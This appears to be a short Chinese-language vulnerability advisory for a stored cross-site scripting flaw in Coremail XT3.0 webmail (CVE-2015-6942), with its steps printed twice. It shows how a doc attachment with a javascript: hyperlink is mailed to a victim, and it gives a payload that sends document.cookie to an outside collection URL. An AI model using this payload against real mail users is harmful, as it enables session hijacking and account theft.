2.创建一封...">
Coremail一处存储型跨站脚本漏洞,已申请CVE编号:CVE-2015-6942
影响版本:XT3.0
其他版本未测试
测试步骤:
1.首先创建一个带有超链接的doc文档,超链接为"javascript:alert()"
2.创建一封邮件并上传附件,然后发送给需要攻击的用户(可发送给任意用户)。
3.受害者如果在WebMail里打开邮件并在线预览doc文档时,点击超链接,即可执行攻击代码。
4.重新将文档中的超链接换成location.href方式获取Cookie的超连接的即可
获取Cookie可以使用此超链接:href=“javascript:c=escape(document.cookie);q=‘http://.../xss/index.htm?ck=’;location.href=(q+c)”
这里只是测试获取cookie,用其他方式发送Cookie也可以。
5.访问收信后台即可看到Cookie
1.首先创建一个带有超链接的doc文档,超链接为"javascript:alert()"
2.创建一封邮件并上传附件,然后发送给需要攻击的用户(可发送给任意用户)。
3.受害者如果在WebMail里打开邮件并在线预览doc文档时,点击超链接,即可执行攻击代码。
4.重新将文档中的超链接换成location.href方式获取Cookie的超连接的即可
获取Cookie可以使用此超链接:href=“javascript:c=escape(document.cookie);q=‘http://.../xss/index.htm?ck=’;location.href=(q+c)”
这里只是测试获取cookie,用其他方式发送Cookie也可以。
5.访问收信后台即可看到Cookie